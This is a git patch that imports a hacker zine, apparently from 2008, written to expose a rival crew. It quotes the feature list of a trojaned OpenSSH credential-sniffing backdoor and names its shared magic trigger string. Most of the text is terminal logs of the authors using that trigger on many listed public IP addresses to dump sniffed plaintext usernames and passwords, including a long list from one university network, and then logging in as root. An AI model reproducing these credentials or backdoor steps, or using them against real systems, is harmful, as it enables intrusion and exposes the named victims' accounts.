From 5bbe77e0674a55b5064a1a4871d755cc35acbf12 Mon Sep 17 00:00:00 2001 From: Rui Reis Date: Mon, 6 Mar 2017 19:36:11 +0000 Subject: [PATCH] 1st import into tree --- x0x0x/x0x0x-exposed.txt | 1257 +++++++++++++++++++++++++++++++++++ x0x0x/x0x0x2.txt | 1404 +++++++++++++++++++++++++++++++++++++++ 2 files changed, 2661 insertions(+) create mode 100644 x0x0x/x0x0x-exposed.txt create mode 100644 x0x0x/x0x0x2.txt diff --git a/x0x0x/x0x0x-exposed.txt b/x0x0x/x0x0x-exposed.txt new file mode 100644 index 0000000..8fd8c17 --- /dev/null +++ b/x0x0x/x0x0x-exposed.txt @@ -0,0 +1,1257 @@ +#!/labsec/v/for/vendetta:book1-x0x0x +###################################################################################################################### +# # +# .____ ___. _________ # +# | | _____ \_ |__ / _____/ ____ ____ # +# | | \__ \ | __ \ \_____ \_/ __ \_/ ___\ # +# | |___ / __ \| \_\ \/ \ ___/\ \___ # +# |_______ (____ /___ /_______ /\___ >\___ > # +# \/ \/ \/ \/ \/ \/ # +# .___ .___ __ .__ # +# | | ____ __| _/_ __ _______/ |________|__| ____ ______ # +# | |/ \ / __ | | \/ ___/\ __\_ __ \ |/ __ \ / ___/ # +# | | | \/ /_/ | | /\___ \ | | | | \/ \ ___/ \___ \ # +# |___|___| /\____ |____//____ > |__| |__| |__|\___ >____ > # +# \/ \/ \/ \/ \/ # +# # +# # +# - presents: # +# \- x0x0x exposed -/ # +# # +###################################################################################################################### +# # +# # +# chapter one : random lame stuff # +# chapter two : owned by yourself # +# chapter three : download files/sniffs/stuff # +# chapter four : conclusion # +# - x0x0x - # +# # +# # +# - [V]endetta. # +# # +################################################################# + + +- hello everyone ! +- the reason of this zine(which by teh way we dont like) is: vendetta >:) +- we've got ourselfs owned around sep~2007 by the most lamer guys on brazil: r4t and his boyfriend skotch.(x0x0x) +- now it's vendetta time ! + + +################################################################# +# # +# # +# _ _ # +# __| |_ __ _ _ __| |_ ___ _ _ ___ _ _ ___ # +# / _| ' \/ _` | '_ \ _/ -_) '_| / _ \ ' \/ -_) # +# \__|_||_\__,_| .__/\__\___|_| \___/_||_\___| # +# |_| # +# # +# # +################################################################# + + +first of all, lets introduce x0x0x, the most pseudo-hackers of efnet: r47(r4t) and skotch(also known by s0l4r1s(nice nick btw)) + +[1]; http://archives.neohapsis.com/archives/fulldisclosure/2007-09/att-0178/x0x0x.txt +[2]; http://lasercomb.de/x0x0x2.txt + +have you noticed how lame they are ? + +all they can & will ever do is change your openssh version to a cracked one +and pray that the users will log into some kool server + +and guess what, its NOT EVEN MADE by them ! - lets check it out - + +central@labsec [~xoxox/openssh-4.7p1] # more skynet.h +/* + + + ### # ### ## ### ## ### ### ###### ###### + ## # ## # ## ## ## # ## # # ## # + #### ### #### ### # #### ## + ### #### ## ##### ## ## + # ## ## ## ## ## ## ## ## ## + #### #### ## #### ### ## ###### #### + + - V E R S I O N 1. 0 - + coded by fmrj + 11.01.2008 + + + Features: + - Logs SSH, SCP, SFTP, SSHD and ip / hostname + - ftp logger included (netkit-ftp) + - Encrypted sniffer logs + - SSH, SCP, SFTP will not log you + - compile script (see compile.sh) + - rootlogin is permitted even though remoterootlogin is set to no + - Will not log to syslog, utmp, wtmp or lastlog + - If MAGIC_VERSION is NOT undeclared: + telnet -hackedbox- 22 and type MAGIC_VERSION will show logs without you having to log in. + (WARNING: telnet does NOT encrypt like SSH, so this would be visible with tcpdump) + Also this will NOT get logged by syslog + + + Future features: + - pid hiding + - More encryption / better sniffer encryption (thought of rc-crypt) + - strace will show that ssh is logging, make it so that if ssh is being ptrace'd it will not log + - Have a cool PS1 for the bd + - Write a ssh client that can: + -> Connect and dump logs so you dont have to use telnet approach (encrypted) + -> That can do connect-chain (ssh -bounce box1 box2 box3) + + + If you have this, it either means we are friends or someone gave it to you, if so + I would like this bd to be kept as private as possible, so please dont pass it on + + I would also appreciate suggestions / ideas / help / whatever for future features + aim: fmrj09 + + + - Thanks * + +*/ + +- then there is some shit aion code which is public @ packetstorm - +- their kool sshd backdoor kan be found in the end of thiz zine - +- dont forget to check the gr8 shellscript skotch made - + +################################## leTz hIghTlIghT 50m3th1n6 ############################# + telnet -hackedbox- 22 and type MAGIC_VERSION will show logs without you having to log in. +################################## LETS HIGHLIGHT SOMETHING ############################# + +ohhhhhhwwwwwwww. k00l 3n0ugh ! +and gu355 wh47 ? +th3y u53 th3 s4m3 m4g1c_v3r510n 1n 4ll th31r k00l l4m3 53rv3r5 ! + +*thinks* is that a deja-vu or something ? i could swear that x0x0x wrote something about it in our zine ! *thinks* + + +central@labsec [~xoxox/openssh-4.7p1] # grep -i magic_version skotch.h +#define MAGIC_VERSION "netdump" + + +----- th4nk5 8uddY ------ +----- end of lame sshd backdor ---- + +***************** phalanx the gr8 kernel rootkit *************** + +7h475 r1gh7. l4m3 55hD b4ckd00R wasnT ENouGH ! +whAT ELsE Do thEY USE ? + +PHALANX ! THE gr8 prIv8 kERn3l r007k17 +get your own at http://packetstormsecurity.org/UNIX/penetration/rootkits/phalanx-b6.tar.bz2 + +* attached their k00l phalanx in the bottom of the zine * + +***************** phalanx the gr8 kernel rootkit *************** + +------ funny stuff: + +while looking at their boxes, we felt so disappointed that they cant even write the right sshd version.. + +[139.82.95.11:22] : SSH-2.0-p2-FC-4.3 +[212.200.96.150:22] : SSH-2.0-OpenSSH_4.3p2, OpenSSL 0.9.8b 04 May 2006 +[216.75.56.186:22] : SSH-2.0-OenSSH_4.2 +[140.122.141.164:2174]: SSH-2.0-p1 Debian-5ubuntu0.5 +[143.107.250.214:22] : SSH-1.99-p1 +[201.62.131.185:22] : SSH-2.0-p1 Debian-8ubuntu1.2 +[200.144.189.17:22] : SSH-1.99-p1 + +you must be asking yourself.. wtf? they cant even copy&paste the right sshd version, how do they own so many servers? +answer: bad system admins. doing a easy md5 checksum on ssh/sshd binaries would do the trick. they dont even check their sshd banners. + + +[[[[[[[[[[[[[[ fAsT rESUMe oF chApTER oNE ]]]]]]]]]]]]] +they suck. they beg for someone to code them some lame kernel rootkit (phalanx) and sshd backdoor which is... around ~90's ? we no longer use them, k ? +they blame us about using the same password, what about thei magic_password ? kool, they use the 'netdump' on all their boxes, +which is the reason for the chapter two. +[[[[[[[[[[[[[[ fAsT rESUMe oF chApTER oNE ]]]]]]]]]]]]] + +################################################################# +# # +# __ __ __ # +# ____/ / ___ ____ / /____ ____ / /__ _____ # +# / __/ _ \/ _ `/ _ \/ __/ -_) __/ / __/ |/|/ / _ \ # +# \__/_//_/\_,_/ .__/\__/\__/_/ \__/|__,__/\___/ # +# /_/ # +# # +# # +################################################################# + +; thiZ iZ WhErE wE StaRT tO SHoW ThEiR kOoL & niCe laMe ServeRS +; 90% oF thEm, thEY Got ThRU SsH SNiFfER WHiCh Is Not KoOL +; and 10% oF thEM, thEY gOT thRu SsHbRutEfoRce WhicH iZ VErY koOl +; +; thAnkZ agAIN MaGiC_vERSIoN ANd ThAnks foR BeInG DuMbER thAn wE usEd to BE + + + + +central@labsec [~xoxox/h3h3] # telnet 189.3.219.4 22 +Trying 189.3.219.4... +Connected to 189.3.219.4 (189.3.219.4). +Escape character is '^]'. +SSH-2.0-OpenSSH_4.7 +netdump --------->>>>>>>>>>>>>>>>>>>>>>>>> r3m3mb3r th1Z:;;;;;/// +SSH2_OUT: 127.0.0.1 user: root pass: R4tD33Gl (localhost) --------->>>>>>>>>>>>>>>>>>>>>>>>> thanks for ssh localhost dewd +- cut- + +******************** th4nk5 f0r 7h3 p455w0rd 7hRu y0uR 0w|\| |_4m3 5n1ff3r, 455h0l3 ******************** +central@labsec [~xoxox/h3h3] # ssh root@189.3.219.4 +root@189.3.219.4's password: + + + +Last login: Fri Aug 8 16:27:40 2008 from 189.4.161.222 + + + **** Connected to **** + + ### # ### ## ### ## ### ### ###### ###### + ## # ## # ## ## ## # ## # # ## # + #### ### #### ### # #### ## + ### #### ## ##### ## ## + # ## ## ## ## ## ## ## ## ## + #### #### ## #### ### ## ###### #### 1.0 + **** Linux servnet 2.6.18-4-486 i686 **** + +root@servnet:~# +root@servnet:~# uname -a;/sbin/ifconfig -a|grep inet +Linux servnet 2.6.18-4-486 #1 Wed Apr 18 09:13:09 UTC 2007 i686 GNU/Linux + inet addr:189.3.219.4 Bcast:189.3.219.63 Mask:255.255.255.192 + +root@servnet:~# last -1 root +root pts/2 189.4.161.222 Fri Aug 8 16:27 - 16:32 (00:04) +222.161.4.189.in-addr.arpa domain name pointer bd04a1de.virtua.com.br. + + +******************** 1 w0nd3r h0w 0ld 55h brut3f0rc3 1z ******************** +-/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\- + +central@labsec [~xoxox/h3h3] # telnet 91.199.207.141 22 +Trying 91.199.207.141... +Connected to 91.199.207.141. +Escape character is '^]'. +SSH-2.0-OpenSSH_4.3 +netdump --------->>>>>>>>>>>>>>>>>>>>>>>>> you have no idea how kool you are +SSH2_OUT: 127.0.0.1 user: root pass: buCeTTT (localhost) --------->>>>>>>>>>>>>>>>>>>>>>>>> oh, thanks. +pass_from: 91.199.207.142 user: root pass: salinarsalinar (x2.sprintdns.net) -->>>>>>>>>> i hope you guys change the passwd real quick :) + +central@labsec [~xoxox/h3h3] # ssh root@91.199.207.141 +root@91.199.207.141's password: + +Last login: Sun Aug 10 12:17:11 2008 from 97.139.broadband2.iol.cz + + **** Connected to **** + + ### # ### ## ### ## ### ### ###### ###### + ## # ## # ## ## ## # ## # # ## # + #### ### #### ### # #### ## + ### #### ## ##### ## ## + # ## ## ## ## ## ## ## ## ## + #### #### ## #### ### ## ###### #### 1.0 + **** Linux x1 2.6.18-6-686 i686 **** + +root@x1:~# +root@x1:~# uname -a;w;last -1 root +Linux x1 2.6.18-6-686 #1 SMP Sat May 24 10:24:42 UTC 2008 i686 GNU/Linux + 08:24:44 up 9 days, 14:48, 0 users, load average: 0.17, 0.11, 0.09 +USER TTY FROM LOGIN@ IDLE JCPU PCPU WHAT +root pts/0 97.139.broadband Sun Aug 10 12:17 - 12:38 (00:20) +root@x1:~# ifconfig -a|grep inet + inet addr:91.199.207.141 Bcast:91.199.207.255 Mask:255.255.255.0 + +-/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\- + +central@labsec [~xoxox/h3h3] # telnet 195.91.248.58 22 +Trying 195.91.248.58... +Connected to 195.91.248.58. +Escape character is '^]'. +SSH-2.0-OpenSSH_4.7 +netdump --------->>>>>>>>>>>>>>>>>>>>>>>>> hi. im a pseudo hacker +SSH2_OUT: 127.0.0.1 user: root pass: DiVRuu (localhost) --------->>>>>>>>>>>>>>>>>>>>>>>>> ok, get in. + + +central@labsec [~xoxox/h3h3] # ssh root@195.91.248.58 +root@195.91.248.58's password: + +Last login: Mon Aug 11 13:00:20 2008 from ppp85-140-31-214.pppoe.mtu-net.ru + + **** Connected to **** + + ### # ### ## ### ## ### ### ###### ###### + ## # ## # ## ## ## # ## # # ## # + #### ### #### ### # #### ## + ### #### ## ##### ## ## + # ## ## ## ## ## ## ## ## ## + #### #### ## #### ### ## ###### #### 1.0 + **** Linux localhost 2.6.24-gentoo-r3 i686 **** + +localhost ~ # +localhost ~ # uname -a;w;last -1 root;/sbin/ifconfig -a|grep inet +Linux localhost 2.6.24-gentoo-r3 #3 SMP Mon Apr 7 18:52:13 Local time zone must be set--see zic m i686 Intel(R) Core(TM)2 Duo CPU E4500 @ 2.20GHz GenuineIntel GNU/Linux + 10:30:35 up 1 day, 22:21, 0 users, load average: 0.15, 0.12, 0.09 +USER TTY LOGIN@ IDLE JCPU PCPU WHAT +root pts/1 ppp85-140-31-214 Mon Aug 11 13:00 - 13:07 (00:06) + +wtmp begins Mon Mar 31 21:49:08 2008 + inet addr:195.91.248.58 Bcast:195.91.248.63 Mask:255.255.255.240 + +-/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\- + +central@labsec [~xoxox/h3h3] # telnet 195.71.126.86 22 +Trying 195.71.126.86... +Connected to 195.71.126.86. +Escape character is '^]'. +SSH-2.0-OpenSSH_4.2 +netdump --------->>>>>>>>>>>>>>>>>>>>>>>>> y0, im leet. +pam_from: 91.128.212.13 user: root pass: w22662s (d91-128-212-13.cust.tele2.at) ---->>>> no localhost this time(yay!) but it works. + +central@labsec [~xoxox/h3h3] # ssh root@195.71.126.86 +root@195.71.126.86's password: + +root@BHC2:/usr/local# uname -a;w;/sbin/ifconfig -a|grep inet +Linux BHC2 2.6.15 #7 SMP PREEMPT Sun Feb 19 23:35:17 CET 2006 i686 GNU/Linux + 08:34:52 up 42 days, 19:58, 3 users, load average: 0,91, 1,05, 1,07 +USER TTY FROM LOGIN@ IDLE JCPU PCPU WHAT +root pts/39 chello0841120232 Sat00 3days 0.93s 0.89s mc +root pts/5 chello0841120232 Fri09 2days 0.01s 0.01s -bash +root pts/7 chello0841120232 Fri23 2days 1:20 1:20 mc + inet Adresse:195.71.126.86 Bcast:195.71.126.95 Maske:255.255.255.240 + +-/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\- + +central@labsec [~xoxox/h3h3] # telnet 152.66.208.100 22 +Trying 152.66.208.100... +Connected to 152.66.208.100. +Escape character is '^]'. +SSH-2.0-OpenSSH_4.3 +netdump --------->>>>>>>>>>>>>>>>>>>>>>>>> there i am. +SSH2_OUT: 127.0.0.1 user: joeb pass: xaoAs.. (localhost) --------->>>>>>>>>>>>>>>>>>>>>>>>> sup joeb +pass_from: 78.131.80.171 user: joeb pass: milegyen (78-131-80-171.pool.hdsnet.hu) > better be changing that by now. +SSH2_OUT: 78.131.80.171 user: joeb pass: megistudom (78-131-80-171.pool.hdsnet.hu)> better be changing that by now. +SSH2_OUT: 84.2.126.154 user: joeb pass: valami (dsl54027E9A.pool.t-online.hu) > better be changing that by now. + +central@labsec [~xoxox/h3h3] # ssh root@152.66.208.100 +root@152.66.208.100's password: + +Last login: Wed Aug 13 08:29:00 2008 from 78-131-80-171.pool.hdsnet.hu + + **** Connected to **** + + ### # ### ## ### ## ### ### ###### ###### + ## # ## # ## ## ## # ## # # ## # + #### ### #### ### # #### ## + ### #### ## ##### ## ## + # ## ## ## ## ## ## ## ## ## + #### #### ## #### ### ## ###### #### 1.0 + **** Linux maszat 2.6.18-6-686-bigmem i686 **** + +root@maszat:~# +root@maszat:~# uname -a;w;/sbin/ifconfig -a|grep inet +Linux maszat 2.6.18-6-686-bigmem #1 SMP Fri Jun 6 23:31:15 UTC 2008 i686 GNU/Linux + 08:41:36 up 25 days, 16:08, 0 users, load average: 0.19, 0.15, 0.05 +USER TTY FROM LOGIN@ IDLE JCPU PCPU WHAT + inet addr:152.66.208.100 Bcast:152.66.208.127 Mask:255.255.255.128 + inet6 addr: 2001:738:2001:2072:207:e9ff:fe24:4236/64 Scope:Global + +-/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\- + +central@labsec [~xoxox/h3h3] # telnet 147.46.242.9 22 +Trying 147.46.242.9... +Connected to 147.46.242.9. +Escape character is '^]'. +SSH-2.0-OpenSSH_4.7 +netdump --------->>>>>>>>>>>>>>>>>>>>>>>>> afterall, why netdump ? +SSH2_OUT: 127.0.0.1 user: root pass: NjKeyJ (localhost) --------->>>>>>>>>>>>>>>>>>>>>>>>> hello sw337Y. +pass_from: 147.46.242.52 user: dreameye pass: ii1945 (ropas.snu.ac.kr) ------>>>>>>>>>>>>>> sorry koreans, nothing personal. +pass_from: 211.48.102.167 user: dk pass: 0ghafjs ------>>>>>>>>>>>>>> i mean, personal with you, you no. + +central@labsec [~xoxox/h3h3] # ssh root@147.46.242.9 +root@147.46.242.9's password: + +Last login: Thu Aug 7 03:35:51 2008 from ropas.snu.ac.kr + + **** Connected to **** + + ### # ### ## ### ## ### ### ###### ###### + ## # ## # ## ## ## # ## # # ## # + #### ### #### ### # #### ## + ### #### ## ##### ## ## + # ## ## ## ## ## ## ## ## ## + #### #### ## #### ### ## ###### #### 1.0 + **** Linux abs 2.6.24-19-server i686 **** + +root@abs:~# +root@abs:~# uname -a;w;/sbin/ifconfig -a|grep inet;last -1 dreameye +Linux abs 2.6.24-19-server #1 SMP Sat Jul 12 00:40:01 UTC 2008 i686 GNU/Linux + 15:49:37 up 8 days, 1:53, 0 users, load average: 0.00, 0.00, 0.00 +USER TTY FROM LOGIN@ IDLE JCPU PCPU WHAT + inet addr:147.46.242.9 Bcast:147.46.242.255 Mask:255.255.255.0 + inet6 addr: fe80::20e:e8ff:fef8:8760/64 Scope:Link + inet addr:127.0.0.1 Mask:255.0.0.0 + inet6 addr: ::1/128 Scope:Host +dreameye pts/0 ropas.snu.ac.kr Thu Aug 7 03:35 - 03:36 (00:00) + +-/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\- + +central@labsec [~xoxox/h3h3] # telnet 200.160.119.92 8022 ----- same applies for 200.160.119.93 (another dumbox on the network) +Trying 200.160.119.92... +Connected to 200.160.119.92. +Escape character is '^]'. +SSH-2.0-OpenSSH_4.3 +netdump --------->>>>>>>>>>>>>>>>>>>>>>>>> has it something to do with my netdump user? +pass_from: 192.168.100.231 user: root pass: m4c4c0z3e1 (tradestation231.eum.intranet)> hello m0nk3y + +central@labsec [~xoxox/h3h3] # ssh root@200.160.119.92 -p 8022 +root@200.160.119.92's password: + +******* no skynet thiz timE *********** h3h3h3h3 *********** + +Last login: Mon Aug 11 21:48:01 2008 from tradestation231.eum.intranet +root@eumisrvgw2:~# +root@eumisrvgw2:/usr/local/temp# uname -a;w;/sbin/ifconfig -a|grep inet +Linux eumisrvgw2 2.6.18-6-686 #1 SMP Fri Jun 6 22:22:11 UTC 2008 i686 GNU/Linux + 03:18:45 up 24 days, 9:43, 0 users, load average: 0.01, 0.03, 0.00 +USER TTY FROM LOGIN@ IDLE JCPU PCPU WHAT + inet addr:192.168.100.242 Bcast:192.168.100.255 Mask:255.255.255.0 + inet6 addr: fe80::219:bbff:fec6:82b6/64 Scope:Link + inet addr:192.168.200.254 Bcast:192.168.200.255 Mask:255.255.255.0 + inet addr:200.160.119.92 Bcast:200.160.119.95 Mask:255.255.255.240 + inet6 addr: fe80::219:bbff:fec6:82b7/64 Scope:Link + inet addr:200.169.223.172 Bcast:200.169.223.175 Mask:255.255.255.248 + +root@eumisrvgw2:~# last -10 root|grep 189\.4 +root pts/0 189.4.161.222 Mon Aug 11 14:24 - 14:44 (00:19) ----------------------->>>>> i wonder who that kool ip iz. + ----------------------->>>>> bruteforce again? what a zhame ! +-/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\- + +central@labsec [~xoxox/h3h3] # telnet 200.20.9.67 22 +Trying 200.20.9.67... +Connected to 200.20.9.67. +Escape character is '^]'. +SSH-2.0-OpenSSH_4.3 +netdump +SSH2_OUT: 127.0.0.1 user: root pass: vEcTrrA (localhost) + +central@labsec [~xoxox/h3h3] # ssh root@200.20.9.67 -p 8022 +root@200.20.9.67's password: + +root@ssh1:~# uname -a;uptime;/sbin/ifconfig -a|grep inet +Linux ssh1 2.6.22-4-k7 #1 SMP Tue Feb 12 17:54:42 UTC 2008 i686 GNU/Linux + 04:38:02 up 54 days, 1:50, 17 users, load average: 0.05, 0.01, 0.00 +root@ssh1:~# ./sheader /usr/include/linux/mac.h|sort|uniq|grep OUT ------------>> this is their default sniffer path. +SSH2_OUT: 10.0.0.101 user: lourenco pass: LiNuX0527 (didi.if.uff.int) +SSH2_OUT: 10.0.0.101 user: lourenco pass: LiNuXS0527 (didi.if.uff.int) +SSH2_OUT: 10.0.0.101 user: nuno pass: surfar (catuaba.if.uff.int) +SSH2_OUT: 10.0.0.106 user: lourenco pass: LiNuX0527 (cerbero4.if.uff.int) +SSH2_OUT: 10.0.0.108 user: critter pass: 559832 (ronaldinho.if.uff.int) +SSH2_OUT: 10.0.0.136 user: davidvaz pass: 2o3145 (barabasi.if.uff.int) +SSH2_OUT: 10.0.0.145 user: lubian pass: 15862jLr (lip-serverI.if.uff.int) +SSH2_OUT: 10.0.0.147 user: mcosta pass: 950205 (nano3.if.uff.int) +SSH2_OUT: 10.0.0.155 user: asa pass: gabixande2 (nanodc01.if.uff.int) +SSH2_OUT: 10.0.0.155 user: mcosta pass: 950205 (nanodc01.if.uff.int) +SSH2_OUT: 10.0.0.156 user: thiagofts pass: 8vacagk (Owner-PC.if.uff.int) +SSH2_OUT: 10.0.0.157 user: alanfr pass: ck37=2x (ltspsrvr.if.uff.int) +SSH2_OUT: 10.0.0.157 user: curso pass: curso (ltspsrvr.if.uff.int) +SSH2_OUT: 10.0.0.157 user: help pass: slacksucks! (ltspsrvr.if.uff.int) +SSH2_OUT: 10.0.0.157 user: opeador pass: slacksucks! (ltspsrvr.if.uff.int) +SSH2_OUT: 10.0.0.157 user: operador pass: slacksucks! (ltspsrvr.if.uff.int) +SSH2_OUT: 10.0.0.179 user: orahcio pass: wulto12 (viagra.if.uff.int) +SSH2_OUT: 10.0.0.188 user: nuno pass: surfar (catuaba.if.uff.int) +SSH2_OUT: 10.0.0.195 user: asa pass: gabixande2 (nano2.if.uff.int) +SSH2_OUT: 10.0.0.196 user: isidoro pass: VU4R9C (zico.if.uff.int) +SSH2_OUT: 10.0.0.2 user: isidoro pass: VU4R9C +SSH2_OUT: 10.0.0.208 user: davidvaz pass: 2o3145 (homer.if.uff.int) +SSH2_OUT: 10.0.0.208 user: davidvaz pass: o3145 (homer.if.uff.int) +SSH2_OUT: 10.0.0.208 user: tgmattos pass: CAMtgm&7 (homer.if.uff.int) +SSH2_OUT: 10.0.0.215 user: asa pass: gabixande2 (cerbero7.if.uff.int) +SSH2_OUT: 10.0.0.215 user: lourenco pass: LiNuX0527 (cerbero7.if.uff.int) +SSH2_OUT: 10.0.0.215 user: lourenco pass: LiNuX05427 (cerbero7.if.uff.int) +SSH2_OUT: 10.0.0.217 user: dionizio pass: Zoedoulos (cerbero9.if.uff.int) +SSH2_OUT: 10.0.0.217 user: lourenco pass: LiNuX0527 (cerbero9.if.uff.int) +SSH2_OUT: 10.0.0.222 user: lourenco pass: LiNuX0527 (romario.if.uff.int) +SSH2_OUT: 10.0.0.222 user: lourenco pass: LiNuX527 (romario.if.uff.int) +SSH2_OUT: 10.0.0.226 user: dionizio pass: Zoedoulos (cerbero10.if.uff.int) +SSH2_OUT: 10.0.0.226 user: lourenco pass: LiNuX0527 (cerbero10.if.uff.int) +SSH2_OUT: 10.0.0.226 user: lourenco pass: exit (cerbero10.if.uff.int) +SSH2_OUT: 10.0.0.227 user: jssm pass: Jujaja (complex000.if.uff.int) +SSH2_OUT: 10.0.0.227 user: nuno pass: surfar (complex000.if.uff.int) +SSH2_OUT: 10.0.0.227 user: pmco pass: druida99 (complex000.if.uff.int) +SSH2_OUT: 10.0.0.231 user: alan pass: ck37=2x +SSH2_OUT: 10.0.0.231 user: root pass: slacksucks! +SSH2_OUT: 10.0.0.231 user: root pass: slacksucks! (urania.if.uff.int) +SSH2_OUT: 10.0.0.246 user: bernardo pass: (damasco.if.uff.int) +SSH2_OUT: 10.0.0.246 user: bernardo pass: truthno1 (damasco.if.uff.int) +SSH2_OUT: 10.0.0.247 user: jssm pass: Jujaja (gould.if.uff.int) +SSH2_OUT: 10.0.0.44 user: tgmattos pass: CAMtgm&7 +SSH2_OUT: 10.0.0.60 user: fsilveira pass: Instituto +SSH2_OUT: 10.0.0.60 user: fsilveira pass: VaiPasSar +SSH2_OUT: 10.0.0.75 user: davidvaz pass: 2o3145 (DOAS-Laptop.if.uff.int) +SSH2_OUT: 10.0.0.78 user: alan pass: ck37=2x (urania.if.uff.int) +SSH2_OUT: 10.0.0.93 user: pmco pass: druida99 (urubu.if.uff.int) +SSH2_OUT: 10.0.0.93 user: pmco pass: druidruida99 (urubu.if.uff.int) +SSH2_OUT: 10.0.0.97 user: critter pass: 559832 (ronaldinho.if.uff.int) + +-/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\- + +central@labsec [~xoxox/h3h3] # telnet 203.161.120.230 22 +Trying 203.161.120.230... +Connected to 203.161.120.230. +Escape character is '^]'. +SSH-2.0-OpenSSH_4.3 +netdump --------->>>>>>>>>>>>>>>>>>>>>>>>> letmein +pass_from: 58.7.216.153 user: root pass: @pixar87 (dsl-58-7-216-153.wa.westnet.com.au) -> h3h3, sorry pal. + +central@labsec [~xoxox/h3h3] # ssh root@203.161.120.230 +root@203.161.120.230's password: + +----- no skynet ------- + +Last login: Tue Aug 12 19:32:36 2008 from dsl-58-7-216-153.wa.westnet.com.au +zeus:~# +zeus:/usr/include/linux# uname -a;w;/sbin/ifconfig -a|grep inet +Linux zeus 2.6.8-2-386 #1 Thu May 19 17:40:50 JST 2005 i686 GNU/Linux + 15:27:04 up 104 days, 6:19, 1 user, load average: 0.00, 0.02, 0.00 +USER TTY FROM LOGIN@ IDLE JCPU PCPU WHAT + inet addr:203.161.120.230 Bcast:203.161.120.255 Mask:255.255.255.240 + inet6 addr: fe80::209:3dff:fe12:67e8/64 Scope:Link + inet addr:11.11.11.3 Bcast:11.255.255.255 Mask:255.255.255.0 + +zeus:/usr/include/linux# ./sheader /usr/include/linux/byteorder/ssh.h|sort|uniq|more +SSH2_OUT: 11.11.11.55 user: michael pass: @pixar87 +SSH2_OUT: 11.11.11.55 user: michael pass: dh0st1ngd +SSH2_OUT: 11.11.11.55 user: michael pass: ruup2it +SSH2_OUT: 11.11.11.55 user: root pass: @pixar87 +SSH2_OUT: 11.11.11.9 user: admin pass: @pixar87 +SSH2_OUT: 11.11.11.9 user: admin pass: emaildivers +SSH2_OUT: 11.11.11.9 user: admin pass: jugg3r0 +SSH2_OUT: 11.11.11.9 user: root pass: @pixar887 +SSH2_OUT: 11.11.11.9 user: root pass: jugg3r0 +pass_from: 10.10.10.129 user: root pass: @pixar87 + +-/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\- + +central@labsec [~xoxox/h3h3] # telnet 207.145.66.12 22 +Trying 207.145.66.12... +Connected to 207.145.66.12. +Escape character is '^]'. +SSH-2.0-OpenSSH_4.7 +netdump --------->>>>>>>>>>>>>>>>>>>>>>>>> smack +pass_from: 24.218.192.76 user: root pass: cl1pt3xt (c-24-218-192-76.hsd1.ma.comcast.net)-> sorry bro +pass_from: 75.68.31.152 user: gman pass: 0xc0ffee (c-75-68-31-152.hsd1.nh.comcast.net) -> >:( + +central@labsec [~xoxox/h3h3] # ssh root@207.145.66.12 +root@207.145.66.12's password: + +Last login: Wed Aug 6 23:25:38 2008 from 189.4.184.201 --------->>>>>>>>>>>>>>>>>>>>>>>>> quick question, who's that ? + --------->>>>>>>>>>>>>>>>>>>>>>>>> doesn't that make you sad? i mean, wtf... + +d4:~# +d4:~# uname -a;w;/sbin/ifconfig -a|grep inet +Linux d4 2.6.25-2-686 #1 SMP Tue May 27 15:38:35 UTC 2008 i686 GNU/Linux + 03:36:51 up 68 days, 4:58, 0 user, load average: 1.88, 1.80, 1.74 +USER TTY FROM LOGIN@ IDLE JCPU PCPU WHAT + inet addr:207.145.66.12 Bcast:207.145.66.255 Mask:255.255.255.0 + inet6 addr: fe80::209:6bff:fe8c:e58/64 Scope:Link + 